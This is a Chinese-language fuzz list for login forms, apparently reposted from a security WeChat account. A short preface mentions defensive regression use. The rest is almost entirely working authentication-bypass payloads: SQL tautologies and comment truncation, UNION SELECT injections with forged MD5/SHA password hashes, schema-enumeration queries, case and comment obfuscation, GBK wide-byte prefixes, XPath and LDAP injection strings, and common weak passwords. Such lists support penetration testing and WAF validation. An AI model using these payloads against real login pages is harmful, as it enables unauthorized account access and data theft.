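登录处SQL注入fuzz清单

说明:以下条目并非全部是SQL注入串,其中还夹杂了常见弱口令(admin、123456、toor 等)、XPath注入(true()、contains()、position())和LDAP过滤器注入(以 *)( 开头的条目)的测试串,以及大小写混写、/**/ 注释和宽字节前缀等变体。注入类条目只有在登录逻辑把输入直接拼接进查询语句时才会生效;改用参数化查询(XPath/LDAP 一侧做相应转义)并以加盐慢哈希校验口令后,这些条目应全部失效,弱口令条目则要靠口令策略和登录限速来应对。因此这份清单适合用作验证修复效果、校验WAF与检测规则的回归输入。个别条目中的 ′、– 和 &lt; 是网页排版或HTML转义留下的字符,并非原始字符。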


admin

password

1234

123456

root

toor

test

guest

' or '1'='1

' or ''='

' or 1]%00

' or /* or '

' or "a" or '

' or 1 or '

' or true() or '

'or string-length(name(.))<10 or'

'or contains(name,'adm') or'

'or contains(.,'adm') or'

'or position()=2 or'

admin' or '

admin' or '1'='2

*

*)(&

*)(|(&

pwd)

*)(|(*

*))%00

admin)(&)

pwd

admin)(!(&(|

pwd))

admin))(|(|

1234

'-'

' '

'&'

'^'

'*'

' or ''-'

' or '' '

' or ''&'

' or ''^'

' or ''*'

"-"

" "

"&"

"^"

"*"

" or ""-"

" or "" "

" or ""&"

" or ""^"

" or ""*"

or true--

" or true--

' or true--

") or true--

') or true--

' or 'x'='x

') or ('x')=('x

')) or (('x'))=(('x

" or "x"="x

") or ("x")=("x

")) or (("x"))=(("x

or 1=1

or 1=1--

or 1=1#

or 1=1/*

admin' --

admin' #

admin'/*

admin' or '1'='1

admin' or '1'='1'--

admin' or '1'='1'#

admin' or '1'='1'/*

admin'or 1=1 or ''='

admin' or 1=1

admin' or 1=1--

admin' or 1=1#

admin' or 1=1/*

admin') or ('1'='1

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/*

admin') or '1'='1

admin') or '1'='1'--

admin') or '1'='1'#

admin') or '1'='1'/*

1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

1234 ' AND 1=0 UNION ALL SELECT 'admin', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220

admin" --

admin" #

admin"/*

admin" or "1"="1

admin" or "1"="1"--

admin" or "1"="1"#

admin" or "1"="1"/*

admin"or 1=1 or ""="

admin" or 1=1

admin" or 1=1--

admin" or 1=1#

admin" or 1=1/*

admin") or ("1"="1

admin") or ("1"="1"--

admin") or ("1"="1"#

admin") or ("1"="1"/*

admin") or "1"="1

admin") or "1"="1"--

admin") or "1"="1"#

admin") or "1"="1"/*

1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

1234 " AND 1=0 UNION ALL SELECT "admin", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220

==

=

'

' --

' #

' –

'--

'/*

'#

" --

" #

"/*

' and 1='1

' and a='a

or true

' or ''='

" or ""="

1′) and '1′='1–

' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055

" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055

' AND 1=0 UNION ALL SELECT '', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220

" AND 1=0 UNION ALL SELECT "", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220

and 1=1

and 1=1–

' and 'one'='one

' and 'one'='one–

' group by password having 1=1--

' group by userid having 1=1--

' group by username having 1=1--

like '%'

or 0=0 --

or 0=0 #

or 0=0 –

' or         0=0 #

' or 0=0 --

' or 0=0 #

' or 0=0 –

" or 0=0 --

" or 0=0 #

" or 0=0 –

%' or '0'='0

or 1=1–

' or 1=1--

' or '1'='1

' or '1'='1'--

' or '1'='1'/*

' or '1'='1'#

' or '1′='1

' or 1=1

' or 1=1 --

' or 1=1 –

' or 1=1;#

' or 1=1/*

' or 1=1#

' or 1=1–

') or '1'='1

') or '1'='1--

') or '1'='1'--

') or '1'='1'/*

') or '1'='1'#

') or ('1'='1

') or ('1'='1--

') or ('1'='1'--

') or ('1'='1'/*

') or ('1'='1'#

'or'1=1

'or'1=1′

" or "1"="1

" or "1"="1"--

" or "1"="1"/*

" or "1"="1"#

" or 1=1

" or 1=1 --

" or 1=1 –

" or 1=1--

" or 1=1/*

" or 1=1#

" or 1=1–

") or "1"="1

") or "1"="1"--

") or "1"="1"/*

") or "1"="1"#

") or ("1"="1

") or ("1"="1"--

") or ("1"="1"/*

") or ("1"="1"#

) or '1′='1–

) or ('1′='1–

' or 1=1 LIMIT 1;#

'or 1=1 or ''='

"or 1=1 or ""="

' or a=a--

' or a=a–

" or "a"="a

") or ("a"="a

') or ('a'='a and hi") or ("a"="a

' or 'one'='one

' or 'one'='one–

' or uid like '%

' or uname like '%

' or userid like '%

' or user like '%

' or username like '%

') or ('x'='x

' OR 'x'='x'#;

'=' 'or' and '=' 'or'

' UNION ALL SELECT 1, @@version;#

' UNION ALL SELECT system_user(),user();#

' UNION select table_schema,table_name FROM information_Schema.tables;#

admin' and substring(password/text(),1,1)='7

' and substring(password/text(),1,1)='7

"

'-- 2

"-- 2

'='

0'&lt;'2

"="

0"&lt;"2

')

")

')-- 2

')/*

')#

")-- 2

") #

")/*

')-('

')&('

')^('

')*('

')=('

0')&lt;('2

")-("

")&("

")^("

")*("

")=("

0")&lt;("2

'-''-- 2

'-''#

'-''/*

'&''-- 2

'&''#

'&''/*

'^''-- 2

'^''#

'^''/*

'*''-- 2

'*''#

'*''/*

'=''-- 2

'=''#

'=''/*

0'&lt;'2'-- 2

0'&lt;'2'#

0'&lt;'2'/*

"-""-- 2

"-""#

"-""/*

"&""-- 2

"&""#

"&""/*

"^""-- 2

"^""#

"^""/*

"*""-- 2

"*""#

"*""/*

"=""-- 2

"=""#

"=""/*

0"&lt;"2"-- 2

0"&lt;"2"#

0"&lt;"2"/*

')-''-- 2

')-''#

')-''/*

')&''-- 2

')&''#

')&''/*

')^''-- 2

')^''#

')^''/*

')*''-- 2

')*''#

')*''/*

')=''-- 2

')=''#

')=''/*

0')&lt;'2'-- 2

0')&lt;'2'#

0')&lt;'2'/*

")-""-- 2

")-""#

")-""/*

")&""-- 2

")&""#

")&""/*

")^""-- 2

")^""#

")^""/*

")*""-- 2

")*""#

")*""/*

")=""-- 2

")=""#

")=""/*

0")&lt;"2-- 2

0")&lt;"2#

0")&lt;"2/*

'oR'2

'oR'2'-- 2

'oR'2'#

'oR'2'/*

'oR'2'oR'

'oR(2)-- 2

'oR(2)#

'oR(2)/*

'oR(2)oR'

'oR 2-- 2

'oR 2#

'oR 2/*

'oR 2 oR'

'oR/**/2-- 2

'oR/**/2#

'oR/**/2/*

'oR/**/2/**/oR'

"oR"2

"oR"2"-- 2

"oR"2"#

"oR"2"/*

"oR"2"oR"

"oR(2)-- 2

"oR(2)#

"oR(2)/*

"oR(2)oR"

"oR 2-- 2

"oR 2#

"oR 2/*

"oR 2 oR"

"oR/**/2-- 2

"oR/**/2#

"oR/**/2/*

"oR/**/2/**/oR"

'oR'2'='2

'oR'2'='2'oR'

'oR'2'='2'-- 2

'oR'2'='2'#

'oR'2'='2'/*

'oR 2=2-- 2

'oR 2=2#

'oR 2=2/*

'oR 2=2 oR'

'oR/**/2=2-- 2

'oR/**/2=2#

'oR/**/2=2/*

'oR/**/2=2/**/oR'

'oR(2)=2-- 2

'oR(2)=2#

'oR(2)=2/*

'oR(2)=(2)oR'

'oR'2'='2' LimIT 1-- 2

'oR'2'='2' LimIT 1#

'oR'2'='2' LimIT 1/*

'oR(2)=(2)LimIT(1)-- 2

'oR(2)=(2)LimIT(1)#

'oR(2)=(2)LimIT(1)/*

"oR"2"="2

"oR"2"="2"oR"

"oR"2"="2"-- 2

"oR"2"="2"#

"oR"2"="2"/*

"oR 2=2-- 2

"oR 2=2#

"oR 2=2/*

"oR 2=2 oR"

"oR/**/2=2-- 2

"oR/**/2=2#

"oR/**/2=2/*

"oR/**/2=2/**/oR"

"oR(2)=2-- 2

"oR(2)=2#

"oR(2)=2/*

"oR(2)=(2)oR"

"oR"2"="2" LimIT 1-- 2

"oR"2"="2" LimIT 1#

"oR"2"="2" LimIT 1/*

"oR(2)=(2)LimIT(1)-- 2

"oR(2)=(2)LimIT(1)#

"oR(2)=(2)LimIT(1)/*

'oR true-- 2

'oR true#

'oR true/*

'oR true oR'

'oR(true)-- 2

'oR(true)#

'oR(true)/*

'oR(true)oR'

'oR/**/true-- 2

'oR/**/true#

'oR/**/true/*

'oR/**/true/**/oR'

"oR true-- 2

"oR true#

"oR true/*

"oR true oR"

"oR(true)-- 2

"oR(true)#

"oR(true)/*

"oR(true)oR"

"oR/**/true-- 2

"oR/**/true#

"oR/**/true/*

"oR/**/true/**/oR"

'oR'2'LiKE'2

'oR'2'LiKE'2'-- 2

'oR'2'LiKE'2'#

'oR'2'LiKE'2'/*

'oR'2'LiKE'2'oR'

'oR(2)LiKE(2)-- 2

'oR(2)LiKE(2)#

'oR(2)LiKE(2)/*

'oR(2)LiKE(2)oR'

"oR"2"LiKE"2

"oR"2"LiKE"2"-- 2

"oR"2"LiKE"2"#

"oR"2"LiKE"2"/*

"oR"2"LiKE"2"oR"

"oR(2)LiKE(2)-- 2

"oR(2)LiKE(2)#

"oR(2)LiKE(2)/*

"oR(2)LiKE(2)oR"

admin

admin'-- 2

admin'#

admin"-- 2

admin"#

ffifdyop

' UniON SElecT 1,2-- 2

' UniON SElecT 1,2,3-- 2

' UniON SElecT 1,2,3,4-- 2

' UniON SElecT 1,2,3,4,5-- 2

' UniON SElecT 1,2#

' UniON SElecT 1,2,3#

' UniON SElecT 1,2,3,4#

' UniON SElecT 1,2,3,4,5#

'UniON(SElecT(1),2)-- 2

'UniON(SElecT(1),2,3)-- 2

'UniON(SElecT(1),2,3,4)-- 2

'UniON(SElecT(1),2,3,4,5)-- 2

'UniON(SElecT(1),2)#

'UniON(SElecT(1),2,3)#

'UniON(SElecT(1),2,3,4)#

'UniON(SElecT(1),2,3,4,5)#

" UniON SElecT 1,2-- 2

" UniON SElecT 1,2,3-- 2

" UniON SElecT 1,2,3,4-- 2

" UniON SElecT 1,2,3,4,5-- 2

" UniON SElecT 1,2#

" UniON SElecT 1,2,3#

" UniON SElecT 1,2,3,4#

" UniON SElecT 1,2,3,4,5#

"UniON(SElecT(1),2)-- 2

"UniON(SElecT(1),2,3)-- 2

"UniON(SElecT(1),2,3,4)-- 2

"UniON(SElecT(1),2,3,4,5)-- 2

"UniON(SElecT(1),2)#

"UniON(SElecT(1),2,3)#

"UniON(SElecT(1),2,3,4)#

"UniON(SElecT(1),2,3,4,5)#

'||'2

'||2-- 2

'||'2'||'

'||2#

'||2/*

'||2||'

"||"2

"||2-- 2

"||"2"||"

"||2#

"||2/*

"||2||"

'||'2'='2

'||'2'='2'||'

'||2=2-- 2

'||2=2#

'||2=2/*

'||2=2||'

"||"2"="2

"||"2"="2"||"

"||2=2-- 2

"||2=2#

"||2=2/*

"||2=2||"

'||2=(2)LimIT(1)-- 2

'||2=(2)LimIT(1)#

'||2=(2)LimIT(1)/*

"||2=(2)LimIT(1)-- 2

"||2=(2)LimIT(1)#

"||2=(2)LimIT(1)/*

'||true-- 2

'||true#

'||true/*

'||true||'

"||true-- 2

"||true#

"||true/*

"||true||"

'||'2'LiKE'2

'||'2'LiKE'2'-- 2

'||'2'LiKE'2'#

'||'2'LiKE'2'/*

'||'2'LiKE'2'||'

'||(2)LiKE(2)-- 2

'||(2)LiKE(2)#

'||(2)LiKE(2)/*

'||(2)LiKE(2)||'

"||"2"LiKE"2

"||"2"LiKE"2"-- 2

"||"2"LiKE"2"#

"||"2"LiKE"2"/*

"||"2"LiKE"2"||"

"||(2)LiKE(2)-- 2

"||(2)LiKE(2)#

"||(2)LiKE(2)/*

"||(2)LiKE(2)||"

')oR('2

')oR'2'-- 2

')oR'2'#

')oR'2'/*

')oR'2'oR('

')oR(2)-- 2

')oR(2)#

')oR(2)/*

')oR(2)oR('

')oR 2-- 2

')oR 2#

')oR 2/*

')oR 2 oR('

')oR/**/2-- 2

')oR/**/2#

')oR/**/2/*

')oR/**/2/**/oR('

")oR("2

")oR"2"-- 2

")oR"2"#

")oR"2"/*

")oR"2"oR("

")oR(2)-- 2

")oR(2)#

")oR(2)/*

")oR(2)oR("

")oR 2-- 2

")oR 2#

")oR 2/*

")oR 2 oR("

")oR/**/2-- 2

")oR/**/2#

")oR/**/2/*

")oR/**/2/**/oR("

')oR'2'=('2

')oR'2'='2'oR('

')oR'2'='2'-- 2

')oR'2'='2'#

')oR'2'='2'/*

')oR 2=2-- 2

')oR 2=2#

')oR 2=2/*

')oR 2=2 oR('

')oR/**/2=2-- 2

')oR/**/2=2#

')oR/**/2=2/*

')oR/**/2=2/**/oR('

')oR(2)=2-- 2

')oR(2)=2#

')oR(2)=2/*

')oR(2)=(2)oR('

')oR'2'='2' LimIT 1-- 2

')oR'2'='2' LimIT 1#

')oR'2'='2' LimIT 1/*

')oR(2)=(2)LimIT(1)-- 2

')oR(2)=(2)LimIT(1)#

')oR(2)=(2)LimIT(1)/*

")oR"2"=("2

")oR"2"="2"oR("

")oR"2"="2"-- 2

")oR"2"="2"#

")oR"2"="2"/*

")oR 2=2-- 2

")oR 2=2#

")oR 2=2/*

")oR 2=2 oR("

")oR/**/2=2-- 2

")oR/**/2=2#

")oR/**/2=2/*

")oR/**/2=2/**/oR("

")oR(2)=2-- 2

")oR(2)=2#

")oR(2)=2/*

")oR(2)=(2)oR("

")oR"2"="2" LimIT 1-- 2

")oR"2"="2" LimIT 1#

")oR"2"="2" LimIT 1/*

")oR(2)=(2)LimIT(1)-- 2

")oR(2)=(2)LimIT(1)#

")oR(2)=(2)LimIT(1)/*

')oR true-- 2

')oR true#

')oR true/*

')oR true oR('

')oR(true)-- 2

')oR(true)#

')oR(true)/*

')oR(true)oR('

')oR/**/true-- 2

')oR/**/true#

')oR/**/true/*

')oR/**/true/**/oR('

")oR true-- 2

")oR true#

")oR true/*

")oR true oR("

")oR(true)-- 2

")oR(true)#

")oR(true)/*

")oR(true)oR("

")oR/**/true-- 2

")oR/**/true#

")oR/**/true/*

")oR/**/true/**/oR("

')oR'2'LiKE('2

')oR'2'LiKE'2'-- 2

')oR'2'LiKE'2'#

')oR'2'LiKE'2'/*

')oR'2'LiKE'2'oR('

')oR(2)LiKE(2)-- 2

')oR(2)LiKE(2)#

')oR(2)LiKE(2)/*

')oR(2)LiKE(2)oR('

")oR"2"LiKE("2

")oR"2"LiKE"2"-- 2

")oR"2"LiKE"2"#

")oR"2"LiKE"2"/*

")oR"2"LiKE"2"oR("

")oR(2)LiKE(2)-- 2

")oR(2)LiKE(2)#

")oR(2)LiKE(2)/*

")oR(2)LiKE(2)oR("

admin')-- 2

admin')#

admin')/*

admin")-- 2

admin")#

') UniON SElecT 1,2-- 2

') UniON SElecT 1,2,3-- 2

') UniON SElecT 1,2,3,4-- 2

') UniON SElecT 1,2,3,4,5-- 2

') UniON SElecT 1,2#

') UniON SElecT 1,2,3#

') UniON SElecT 1,2,3,4#

') UniON SElecT 1,2,3,4,5#

')UniON(SElecT(1),2)-- 2

')UniON(SElecT(1),2,3)-- 2

')UniON(SElecT(1),2,3,4)-- 2

')UniON(SElecT(1),2,3,4,5)-- 2

')UniON(SElecT(1),2)#

')UniON(SElecT(1),2,3)#

')UniON(SElecT(1),2,3,4)#

')UniON(SElecT(1),2,3,4,5)#

") UniON SElecT 1,2-- 2

") UniON SElecT 1,2,3-- 2

") UniON SElecT 1,2,3,4-- 2

") UniON SElecT 1,2,3,4,5-- 2

") UniON SElecT 1,2#

") UniON SElecT 1,2,3#

") UniON SElecT 1,2,3,4#

") UniON SElecT 1,2,3,4,5#

")UniON(SElecT(1),2)-- 2

")UniON(SElecT(1),2,3)-- 2

")UniON(SElecT(1),2,3,4)-- 2

")UniON(SElecT(1),2,3,4,5)-- 2

")UniON(SElecT(1),2)#

")UniON(SElecT(1),2,3)#

")UniON(SElecT(1),2,3,4)#

")UniON(SElecT(1),2,3,4,5)#

')||('2

')||2-- 2

')||'2'||('

')||2#

')||2/*

')||2||('

")||("2

")||2-- 2

")||"2"||("

")||2#

")||2/*

")||2||("

')||'2'=('2

')||'2'='2'||('

')||2=2-- 2

')||2=2#

')||2=2/*

')||2=2||('

")||"2"=("2

")||"2"="2"||("

")||2=2-- 2

")||2=2#

")||2=2/*

")||2=2||("

')||2=(2)LimIT(1)-- 2

')||2=(2)LimIT(1)#

')||2=(2)LimIT(1)/*

")||2=(2)LimIT(1)-- 2

")||2=(2)LimIT(1)#

")||2=(2)LimIT(1)/*

')||true-- 2

')||true#

')||true/*

')||true||('

")||true-- 2

")||true#

")||true/*

")||true||("

')||'2'LiKE('2

')||'2'LiKE'2'-- 2

')||'2'LiKE'2'#

')||'2'LiKE'2'/*

')||'2'LiKE'2'||('

')||(2)LiKE(2)-- 2

')||(2)LiKE(2)#

')||(2)LiKE(2)/*

')||(2)LiKE(2)||('

")||"2"LiKE("2

")||"2"LiKE"2"-- 2

")||"2"LiKE"2"#

")||"2"LiKE"2"/*

")||"2"LiKE"2"||("

")||(2)LiKE(2)-- 2

")||(2)LiKE(2)#

")||(2)LiKE(2)/*

")||(2)LiKE(2)||("

' UnION SELeCT 1,2`

' UnION SELeCT 1,2,3`

' UnION SELeCT 1,2,3,4`

' UnION SELeCT 1,2,3,4,5`

" UnION SELeCT 1,2`

" UnION SELeCT 1,2,3`

" UnION SELeCT 1,2,3,4`

" UnION SELeCT 1,2,3,4,5`

' or 1=1 limit 1 -- -+

'="or'

Pass1234.

Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658

Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658'#

Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.

Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.')#

Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61

Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61'#

Pass1234.' and 1=0 union select 'admin',sha('Pass1234.

Pass1234.' and 1=0 union select 'admin',sha('Pass1234.')#

Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658

Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658"#

Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.

Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.")#

Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61

Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61"#

Pass1234." and 1=0 union select "admin",sha("Pass1234.

Pass1234." and 1=0 union select "admin",sha("Pass1234.")#

%A8%27 Or 1=1-- 2

%8C%A8%27 Or 1=1-- 2

%bf' Or 1=1 -- 2

%A8%27 Or 1-- 2

%8C%A8%27 Or 1-- 2

%bf' Or 1-- 2

%A8%27Or(1)-- 2

%8C%A8%27Or(1)-- 2

%bf'Or(1)-- 2

%A8%27||1-- 2

%8C%A8%27||1-- 2

%bf'||1-- 2

%A8%27) Or 1=1-- 2

%8C%A8%27) Or 1=1-- 2

%bf') Or 1=1 -- 2

%A8%27) Or 1-- 2

%8C%A8%27) Or 1-- 2

%bf') Or 1-- 2

%A8%27)Or(1)-- 2

%8C%A8%27)Or(1)-- 2

%bf')Or(1)-- 2

%A8%27)||1-- 2

%8C%A8%27)||1-- 2

%bf')||1-- 2


 

原文始发于微信公众号(道一安全):【SRC必备|收藏|备用】登录处SQL注入fuzz清单

 
